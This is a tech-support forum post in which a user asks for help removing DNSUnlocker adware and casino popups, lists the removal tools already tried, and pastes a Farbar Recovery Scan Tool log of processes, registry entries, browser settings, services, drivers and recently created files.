Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Impossible adware ''DNSUnlocker'', Online casino popups/ads.


  • This topic is locked This topic is locked
6 replies to this topic

#1 swaykeb00b

swaykeb00b

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:05:14 AM

Posted 25 December 2015 - 06:10 PM

I'm having trouble with adware, ive tried just about anything to remove it aswell including these steps:

 

 - Running ADWCLEANER, Adware removal tool (Techsupportall Team), combofixer, Junkware removal tool, rkill, tdsskiller, malwarebytes

 - Switching browsers from chrome to firefox (Helped a bit, but still get lots of popups/ads where they shouldnt be)

 

When running ADWCLEANER i had no success first, i then turned off my internet whilst scanning with it, and it came up with lots of results; every time i delete these results, they pop up again right after.

same scenario with the Techsupportall team's version, i then ran JRT with some results, same thing. I scanned, deleted but the same things pop up still, i then ran rkill, tdsskiller, combofix and malwarebytes out of panic, malwarebytes came up with 42 different threats (PUP's) which i quarantined and deleted afterwards. I probably wasn't supposed to run Combofix as i came to this forum and saw the warning at the top of the forum, i hope this doesn't interrupt anything.

 

Here are the logs i was requested to present in the guide to posting:

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:25-12-2015
Ran by Simon (administrator) on SIMON-PC (25-12-2015 23:58:20)
Running from C:\Users\Simon\Downloads
Loaded Profiles: Simon (Available Profiles: Simon)
Platform: Windows 7 Professional Service Pack 1 (X64) Language: Norsk, bokmål (Norge)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvxdsync.exe
(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDService.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrl.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe
(Nota Inc.) C:\Program Files (x86)\Gyazo\GyStation.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(ELAN Microelectronics Corp.) C:\Program Files\Elantech\ETDCtrlHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
(NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display\nvtray.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Spotify Ltd) C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\macromed\flash\FlashPlayerPlugin_20_0_0_235.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-30] (Intel Corporation)
HKLM\...\Run: [ShadowPlay] => C:\Windows\system32\rundll32.exe C:\Windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
HKLM\...\Run: [ETDCtrl] => C:\Program Files\Elantech\ETDCtrl.exe [2891568 2013-10-22] (ELAN Microelectronics Corp.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13667032 2014-01-20] (Realtek Semiconductor)
HKLM\...\Run: [NvBackend] => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe [2585928 2015-01-16] (NVIDIA Corporation)
HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-12-20] (Intel Corporation)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2694040 2014-07-22] (Adobe Systems Incorporated)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify Web Helper] => C:\Users\Simon\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2346096 2015-12-25] (Spotify Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7451928 2015-03-13] (Piriform Ltd)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Gyazo] => C:\Program Files (x86)\Gyazo\GyStation.exe [3098424 2015-08-19] (Nota Inc.)
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\...\Run: [Spotify] => C:\Users\Simon\AppData\Roaming\Spotify\Spotify.exe [8387696 2015-12-25] (Spotify Ltd)
AppInit_DLLs: C:\Windows\System32\nvinitx.dll => C:\Windows\System32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs: ,C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [177624 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32: c:\Windows\SysWOW64\nvinit.dll => c:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
AppInit_DLLs-x32:  C:\Windows\SysWOW64\nvinit.dll => C:\Windows\SysWOW64\nvinit.dll [164568 2015-01-10] (NVIDIA Corporation)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync_x64.dll [2014-07-16] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: Hosts file not detected in the default directory
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{4B93233A-B173-4539-92C3-0DD5545714B4}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-1743091598-2114630970-4208458173-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkId=56626&homepage=hxxp://go.microsoft.com/fwlink/p/?LinkId=255141
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-10-12] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-10-12] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Simon\AppData\Roaming\Mozilla\Firefox\Profiles\0n9rh6yz.default-1451081654131
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_235.dll [2015-12-25] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin: adobe.com/AdobeAAMDetect_x86_64 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2014-07-22] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_235.dll [2015-12-25] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-07-25] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.1\npGoogleUpdate3.dll [2015-12-25] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2014-07-23] (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-05-01] (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2014-07-22] (Adobe Systems)

Chrome: 
=======
CHR dev: Chrome dev build detected! <======= ATTENTION
CHR DefaultSearchURL: Default -> hxxps://duckduckgo.com/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> duckduckgo.com
CHR DefaultSuggestURL: Default -> hxxps://ac.duckduckgo.com/ac/?q={searchTerms}&type=list
CHR Profile: C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (gEotit4cheapier) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\aplmodepkfbkgbcilffogjhmecfclgmn [2015-01-28]
CHR Extension: (YouTube) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-11]
CHR Extension: (Google Search) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-01]
CHR Extension: (Gmail) - C:\Users\Simon\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-04-13]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2015-10-12]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2015-10-12] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2015-10-12] (Microsoft Corporation)
R2 ETDService; C:\Program Files\Elantech\ETDService.exe [101680 2013-10-15] (ELAN Microelectronics Corp.)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1148744 2015-01-16] (NVIDIA Corporation)
R2 IAStorDataMgrSvc; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [15720 2013-08-30] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706312 2015-01-16] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833544 2015-01-16] (NVIDIA Corporation)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 busenum; C:\Windows\System32\DRIVERS\SteelBus64.sys [145408 2014-01-08] (SteelSeries Corporation) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-30] (Intel Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [192216 2015-12-25] (Malwarebytes)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\NETwsw02.sys [3599840 2013-10-14] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2015-01-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 SAlphamHid; C:\Windows\System32\DRIVERS\SAlpham64.sys [38016 2013-05-31] (SteelSeries Corporation) [File not signed]
S3 SAlphaPS2; C:\Windows\System32\DRIVERS\SAlphaPS264.sys [26496 2013-12-12] (SteelSeries Corporation) [File not signed]
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [25088 2015-04-14] (SteelSeries ApS)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-25 23:58 - 2015-12-25 23:58 - 00016413 _____ C:\Users\Simon\Downloads\FRST.txt
2015-12-25 23:58 - 2015-12-25 23:58 - 00000000 ____D C:\FRST
2015-12-25 23:57 - 2015-12-25 23:57 - 02370560 _____ (Farbar) C:\Users\Simon\Downloads\FRST64.exe
2015-12-25 23:34 - 2015-12-25 23:35 - 00000059 _____ C:\Users\Simon\Desktop\da.txt
2015-12-25 23:21 - 2015-12-25 23:21 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-25 23:21 - 2015-12-25 23:21 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-25 23:14 - 2015-12-25 23:14 - 00000000 ____D C:\Users\Simon\Desktop\Gamle Firefox-data
2015-12-25 23:13 - 2015-12-25 23:13 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00001151 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-25 23:12 - 2015-12-25 23:12 - 00248616 _____ C:\Users\Simon\Downloads\Firefox Setup Stub 43.0.2.exe
2015-12-25 22:17 - 2015-12-25 22:17 - 00001459 _____ C:\Users\Simon\Desktop\JRT.txt
2015-12-25 22:06 - 2015-12-25 22:08 - 00000000 ____D C:\Program Files\Adware-Removal-Tool
2015-12-25 22:06 - 2015-12-25 22:06 - 00290304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\subinacl.exe
2015-12-25 22:03 - 2015-12-25 22:03 - 00000000 ___SD C:\ComboFix
2015-12-25 21:52 - 2011-06-26 07:45 - 00256000 _____ C:\Windows\PEV.exe
2015-12-25 21:52 - 2010-11-07 18:20 - 00208896 _____ C:\Windows\MBR.exe
2015-12-25 21:52 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00098816 _____ C:\Windows\sed.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00080412 _____ C:\Windows\grep.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00068096 _____ C:\Windows\zip.exe
2015-12-25 21:51 - 2015-12-25 22:03 - 00000000 ____D C:\Qoobox
2015-12-25 21:51 - 2015-12-25 22:01 - 00000000 ____D C:\Windows\erdnt
2015-12-25 21:37 - 2015-12-25 21:38 - 00209654 _____ C:\TDSSKiller.3.1.0.9_25.12.2015_21.37.24_log.txt
2015-12-25 21:22 - 2015-12-25 23:04 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-25 21:21 - 2015-12-25 21:58 - 00000000 ____D C:\Users\Simon\Desktop\Malware - Bleeping Computer
2015-12-25 21:21 - 2015-12-25 21:21 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-25 21:12 - 2015-12-25 23:31 - 00000000 ____D C:\AdwCleaner
2015-12-25 21:02 - 2015-12-25 22:16 - 00000000 ____D C:\Users\Simon\Desktop\TXT
2015-12-25 21:01 - 2015-12-25 21:02 - 00000000 ____D C:\Users\Simon\Desktop\ungdomsskole
2015-12-25 21:00 - 2015-12-25 21:03 - 00000000 ____D C:\Users\Simon\Desktop\Bilder
2015-12-23 02:41 - 2015-12-23 02:41 - 09498816 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 03170304 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00709632 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-12-23 02:20 - 2015-11-20 19:33 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-23 02:20 - 2015-11-11 22:12 - 00387792 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 21:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 01735680 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 00525312 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 01242624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 00487936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 17:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-23 02:20 - 2015-11-11 16:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-23 02:20 - 2015-11-11 15:57 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01008640 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-23 02:20 - 2015-11-10 19:39 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:37 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-23 02:20 - 2015-11-10 18:47 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-23 02:20 - 2015-11-10 01:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-23 02:20 - 2015-11-10 01:13 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-12-23 02:20 - 2015-11-10 01:12 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-10 01:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-23 02:20 - 2015-11-10 01:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-12-23 02:20 - 2015-11-10 01:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
